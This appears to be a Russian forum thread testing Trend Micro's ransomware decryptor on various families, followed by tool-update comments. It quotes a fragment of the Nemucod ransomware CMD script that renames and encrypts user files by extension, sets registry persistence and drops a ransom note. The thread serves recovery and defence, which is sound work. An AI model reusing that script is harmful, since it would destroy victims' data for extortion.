CHKLST.RU

Проверяем Trend Micro Ransomware File Decryptor

отредактировано 20 авг Раздел: Шифровирусы шумной толпою
vl5m3re18xg4.jpg
Supported Ransomware Families:
The following list describes the known ransomware-encrypted files types can be handled by the latest version of the tool.
Ransomware File name and extension
CryptXXX V1, V2, V3* {original file name}.crypt, crypz, or 5 hexadecimal characters
TeslaCrypt V1** {original file name}.ECC
TeslaCrypt V2** {original file name}.VVV, CCC, ZZZ, AAA, ABC, XYZ
TeslaCrypt V3 {original file name}.XXX or TTT or MP3 or MICRO
TeslaCrypt V4 File name and extension are unchanged
SNSLocker {Original file name}.RSNSLocked
AutoLocky {Original file name}.locky
BadBlock {Original file name}
777 {Original file name}.777
XORIST {Original file name}.xorist or random extension
XORBAT {Original file name}.crypted
CERBER {Original file name}.cerber

http://esupport.trendmicro.com/solution/en-us/1114221.aspx
1. CryptXX {original file name}.crypt расшифрован по паре чистый-зашифрованный файл, довольно быстрая расшифровка.
2. Teslacrypt V1, V2 / дешифратор просто никакой, ощущение что сделали для галочки.
3. TeslaCrypt v3, v4 расшифровывается успешно. (по известному мастер-ключу)
4. Badblock не получилось расшифровать;
5. xorist /.xorist or random extension/ успешно расшифрован по паре чистый-зашифрованный файл.... уже хорошо. Время вычисление ключа приемлемое, однако ЦП загружает под 100%
6. XORBAT {Original file name}.crypted ...это скорее всего Nemucod: да, отличная здесь расшифровка!

This ransomware is currently a part of the Nemucod TrojanDownloader and is spread through javascript (.JS) attachments sent via email. The interesting part of this ransomware implementation is that the encryption steps are broken up between two different programs. The Javascript installers generates the various command and batch files, which use a downloaded files to perform the actual encryptions.

When the user opens the JS attachment, the javascript will download and save a ransomware executable to %TEMP%\5021052.exe. This executable, though, is not launched yet. Then the script creates and launches a CMD script that contains the commands that will be used to scan for targeted files and encrypt them.

This CMD script will search for files that contain certain file extensions and when it discoverers a targeted file, will rename it to have the .CRYPTED extension, and then launches the %TEMP%\5021052.exe with the file as an argument. The 5021052.exe executable will then encrypt the first 2048 bytes of the file using XOR encryption.

пример скрипта:
dir /B "C:\" && for /r "C:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\DOCUME~1\user\LOCALS~1\Temp\323476.exe "%%i.crypted")
...
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\DOCUME~1\user\LOCALS~1\Temp\323476.txt"
REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\DOCUME~1\user\LOCALS~1\Temp\323476.txt\""
copy /y "C:\DOCUME~1\user\LOCALS~1\Temp\323476.txt" "%AppData%\Desktop\DECRYPT.txt"
copy /y "C:\DOCUME~1\user\LOCALS~1\Temp\323476.txt" "%UserProfile%\Desktop\DECRYPT.txt"
copy /y "C:\DOCUME~1\user\LOCALS~1\Temp\323476.txt" "C:\DOCUME~1\user\LOCALS~1\Temp\323476.exe"
del "C:\DOCUME~1\user\LOCALS~1\Temp\323476.exe"
del "C:\DOCUME~1\user\LOCALS~1\Temp\323476.cmd" & notepad.exe "C:\DOCUME~1\user\LOCALS~1\Temp\323476.txt"
http://www.bleepingcomputer.com/news/security/decryptor-released-for-the-nemucod-trojans-crypted-ransomware/
по Nemucod утилита от F.Wosar мгновенно вычисляет ключ

Decryption key found
The decrypter detected the following key to be a match for the given file:

ZWQxZTY5MjgyZDJhNGM4NWQ4YjBmOTEwNTA1YzNjYTZBVEgzWkd0a0F6UjBBd1JrQTJaalpHSXhabUhsTVRSbU1UTDVCR3gyTVFPUEUwNGxEeHExckgxWEZLeUFxMDE2REhjUlowa1hFS0lPb0tPZ0RLY1JaU2JsSTN1bnEzRGtKeGNLRzBIa0RHRVJySElKREh1R0F4SVlxSjVTWlF4bEZhcUtIejlGSDFJakhJQUNwYXlPWnhjNEwwZ2tGU3F

Please keep in mind that there is a slight chance that this key might be wrong. We suggest trying decrypting a few files first to check whether it is working correctly.
ОК
проверяем расшифровку: работает.
Encrypted file: E:\decrypt\DATA\nemucod\1\Правила поведения вахтеров.jpg.crypted
Decrypted file: E:\decrypt\DATA\nemucod\1\Правила поведения вахтеров.jpg
Status: Successfully decrypted!

Encrypted file: E:\decrypt\DATA\nemucod\1\15092014 16_55_03.xls.crypted
Decrypted file: E:\decrypt\DATA\nemucod\1\15092014 16_55_03.xls
Status: Successfully decrypted!

Encrypted file: E:\decrypt\DATA\nemucod\1\keygpg.rar.crypted
Decrypted file: E:\decrypt\DATA\nemucod\1\keygpg.rar
Status: Successfully decrypted!

Encrypted file: E:\decrypt\DATA\nemucod\1\акт.pdf.crypted
Decrypted file: E:\decrypt\DATA\nemucod\1\акт.pdf
Status: Successfully decrypted!

Finished!
проверяем TMRFDecryptor: отлично! работает расшифровка.
Тэги темы:

Комментарии

  • отредактировано Август 2016 PM
    выпущен новый релиз:1.0.1622 (предыдущий был .1617)

    Supported Ransomware Families
    The following list describes the known ransomware-encrypted files types can be handled by the latest version of the tool.
    Ransomware File name and extension
    CryptXXX V1, V2, V3* {original file name}.crypt, cryp1, crypz, or 5 hexadecimal characters
    CryptXXX V4, V5 {MD5 Hash}.5 hexadecimal characters
    TeslaCrypt V1** {original file name}.ECC
    TeslaCrypt V2** {original file name}.VVV, CCC, ZZZ, AAA, ABC, XYZ
    TeslaCrypt V3 {original file name}.XXX or TTT or MP3 or MICRO
    TeslaCrypt V4 File name and extension are unchanged
    SNSLocker {Original file name}.RSNSLocked
    AutoLocky {Original file name}.locky
    BadBlock {Original file name}
    777 {Original file name}.777
    XORIST {Original file name}.xorist or random extension
    XORBAT/Nemucod {Original file name}.crypted
    CERBER {10 random characters}.cerber

    http://esupport.trendmicro.com/solution/en-us/1114221.aspx
  • отредактировано Октябрь 2016 PM
    обновление: 1.0.1627 от 5 августа
    Ransomware File name and extension
    +
    CERBER V1 {10 random characters}.cerber
    +Stampado {Original file name}.locked
    +Nemucod {Original file name}.crypted


    http://esupport.trendmicro.com/solution/en-us/1114221.aspx
  • отредактировано Октябрь 2016 PM
    обновление 1.0.1635 от 18августа
    Ransomware File name and extension
    +
    +Chimera {Original file name}.crypt

    http://esupport.trendmicro.com/solution/en-us/1114221.aspx

    добавлена расшифровка по Chimera, видимо за счет ключей, предоставленных разработчиками Petya&Misha.
    Некто под псевдонимом JanusSecretary, известный как автор вымогательского ПО Petya, опубликовал в открытом доступе 3,5 тыс. ключей для дешифровки файлов, зашифрованных другим вредоносом – Chimera.
    dz9skd0nadu3.jpg
  • отредактировано Октябрь 2016 PM
    обновление 1.0.1639 от 02сентября.
    Ransomware File name and extension
    +
    LECHIFFRE {Original file name}.LeChiffre
    MirCop Lock.{Original file name}

    https://success.trendmicro.com/solution/1114221
    расшифровка по Lechiffre видимо работает только если утилита запускается в зашифрованной системе
  • отредактировано Октябрь 2016 PM
    Updated: 30 Sep 2016
    Jigsaw {Original file name}.random extension
    Globe/Purge V1: {Original file name}.purge
    V2: {Original file name}.{email address + random characters}

    https://success.trendmicro.com/solution/1114221
  • отредактировано Ноябрь 2016 PM
    Updated: 19 Oct 2016
    Globe/Purge V1: {Original file name}.purge
    V2: {Original file name}.{email address + random characters}
    V3: Extension not fixed or file name encrypted
    DXXD V1: {Original file name}.{Original extension}dxxd

    https://success.trendmicro.com/solution/1114221
  • отредактировано Ноябрь 2016 PM
    Updated: 14 Nov 2016, ver:1.0.1653
    Ransomware File name and extension

    Teamxrat/Xpan V2: {Original filename}.__xratteamLucked

    https://success.trendmicro.com/solution/1114221
  • отредактировано Ноябрь 2016 PM
    Updated: 28 Nov 2016, ver:1.0.1654

    (как и предполагал, добавили расшифровку CrySiS)
    Ransomware File name and extension
    CryptXXX V1, V2, V3* {original file name}.crypt, cryp1, crypz, or 5 hexadecimal characters
    CryptXXX V4, V5 {MD5 Hash}.5 hexadecimal characters
    Crysis .{id}.{email address}.xtbl, crypt
    TeslaCrypt V1** {original file name}.ECC
    TeslaCrypt V2** {original file name}.VVV, CCC, ZZZ, AAA, ABC, XYZ
    TeslaCrypt V3 {original file name}.XXX or TTT or MP3 or MICRO
    TeslaCrypt V4 File name and extension are unchanged
    SNSLocker {Original file name}.RSNSLocked
    AutoLocky {Original file name}.locky
    BadBlock {Original file name}
    777 {Original file name}.777
    XORIST {Original file name}.xorist or random extension
    XORBAT {Original file name}.crypted
    CERBER V1 {10 random characters}.cerber
    Stampado {Original file name}.locked
    Nemucod {Original file name}.crypted
    Chimera {Original file name}.crypt
    LECHIFFRE {Original file name}.LeChiffre
    MirCop Lock.{Original file name}
    Jigsaw {Original file name}.random extension
    Globe/Purge V1: {Original file name}.purge
    V2: {Original file name}.{email address + random characters}
    V3: Extension not fixed or file name encrypted
    DXXD V1: {Original file name}.{Original extension}dxxd
    Teamxrat/Xpan V2: {Original filename}.__xratteamLucked
    Crysis .{id}.{email address}.xtbl, crypt
  • отредактировано Декабрь 2016 PM
    Updated: 23 Dec 2016, ver:1.0.1655
    https://success.trendmicro.com/solution/1114221


  • отредактировано 22 янв PM
    Updated: 22 Jan 2017, ver:1.0.1657
    https://success.trendmicro.com/solution/1114221
    новых шифраторов в списке Trend Micro Ransomware File Decryptor v 1.0.1657 нет.
    Возможно, улучшена расшифровка по ранее добавленным в список шифраторов.
  • отредактировано 18 фев PM
    Updated: 17 Feb 2017, ver: 1.0.1658
    Ransomware File name and extension
    TeleCrypt {Original file name}
    DemoTool .demoadc

    https://success.trendmicro.com/solution/1114221
  • Updated: 13 Mar 2017, ver: 1.0.1659

    добавлена расшифровка Crysis.dharma
    Crysis .{id}.{email address}.xtbl, .{id}.{email address}.dharma, crypt

    https://success.trendmicro.com/solution/1114221
  • отредактировано 27 июл PM
    хм, интересно, Trend Micro добавил расшифровку WNCry:

    Updated: 21 May 2017 ver 1.0.1663
    WannaCry (WCRY) {Original file name}.WNCRY, {Original file name}.WCRY
    Этот инструмент выполняет поиск закрытого ключа в памяти процесса выдачи, что означает, что он эффективен только в том случае, если исходный процесс WansCry ransomware все еще существует и активно работает. Если зараженная машина перезагружена, процесс шифрования будет как-то остановлен после первоначального заражения или возникнет какая-либо другая ситуация, которая повлияет на память процесса на зараженном компьютере, и дешифрование завершится неудачей. Очень важно, чтобы пользователи не пытались перезагрузить систему перед тем, как попробовать инструмент.

    В настоящее время неизвестно, как долго простые числа (связанные с закрытым ключом) будут храниться в адресном пространстве памяти перед повторным использованием или перезаписью. Поэтому желательно запускать этот инструмент на ранней стадии заражения, а не позже.

    Основываясь на внутренних тестах Trend Micro, этот инструмент имеет самый высокий уровень успеха на машинах Windows XP (x86) по сравнению с очень низкой скоростью в других версиях Windows, но скорость успеха отдельных пользователей будет отличаться.

    https://success.trendmicro.com/solution/1114221
    таки расшифровки нет.
  • отредактировано 27 июл PM
    Trend Micro добавил таки работающую расшифровку Crysis.wallet/union

    Updated: 31 May 2017 er 1.0.1664
    Crysis .{id}.{email address}.xtbl, .{id}.{email address}.crypt, .{id}.{email addres}.dharma, .{id}.{email address}.wallet

    https://success.trendmicro.com/solution/1114221
  • отредактировано 27 июл PM
    Trend Micro добавил расшифровку оригинального Petya RED/GREEN/GOLDENEYE:

    Updated: 26 Jul 2017
    WannaCry (WCRY) {Original file name}.WNCRY, {Original file name}.WCRY
    Petya N/A
    The Petya tool has a special UI. To boot your OS back to normal, do the following:

    Select the Petya family on your machine from the ransomware note screen then choose a screen font color from the dropdown option.

    Enter your personal decryption code in the boxes found on the ransomware note screen.

    The decryption code is case sensitive.
    Click the Decrypt Key button to show the decrypt key in the text box.
    On the infected machine, enter the decrypt key from the tool and click Enter to reboot the machine and boot your OS back to normal.
    https://success.trendmicro.com/solution/1114221
Войдите или Зарегистрируйтесь чтобы комментировать.